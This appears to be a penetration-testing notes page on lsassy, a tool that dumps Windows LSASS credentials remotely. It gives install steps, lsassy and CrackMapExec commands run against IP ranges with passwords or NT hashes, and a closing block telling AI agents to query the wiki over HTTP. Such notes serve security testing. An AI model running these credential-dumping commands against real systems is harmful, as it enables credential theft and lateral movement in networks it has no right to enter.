# Lsassy

{% embed url="<https://github.com/Hackndo/lsassy>" %}

## Installation

$ git clone <https://github.com/Hackndo/lsassy.git>

$ python3 -m pip install lsassy

$ python3 setup.py install

## Basic Usage

$ lsassy \[-d domain] -u user -p password targets

$ lsassy \[-d domain] -u user -H \[LM:]NT targets

$ lsassy -d adsec.local -u pixis -p p4ssw0rd 192.168.1.0/24

$ lsassy -d adsec.local -u pixis -p p4ssw0rd 192.168.1.1-10

$ lsassy -d adsec.local -u pixis -p p4ssw0rd hosts.txt

$ lsassy -d adsec.local -u pixis -p p4ssw0rd 192.168.1.1-192.168.1.10

LSASSY provides some additional, more advanced, tools. The github has a good write-up of these tools. This include Pass-the-Has, Cleartext Credentials, Kerberos and so on.

## CME add-on to dump creds

$ cme smb 192.168.255.131 -u administrator -p pass -M lsassy


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.brinkles.wiki/tools/internal-tools/lsassy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
